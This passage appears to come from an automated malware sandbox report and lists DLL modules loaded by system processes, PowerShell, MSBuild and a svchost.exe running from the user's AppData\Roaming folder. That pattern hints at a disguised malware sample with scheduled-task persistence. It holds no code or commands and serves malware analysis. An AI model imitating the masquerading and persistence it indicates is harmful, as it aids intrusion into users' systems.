                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: riched20.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: usp10.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msls31.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptnet.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: logoncli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: riched20.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: usp10.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msls31.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptnet.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: logoncli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
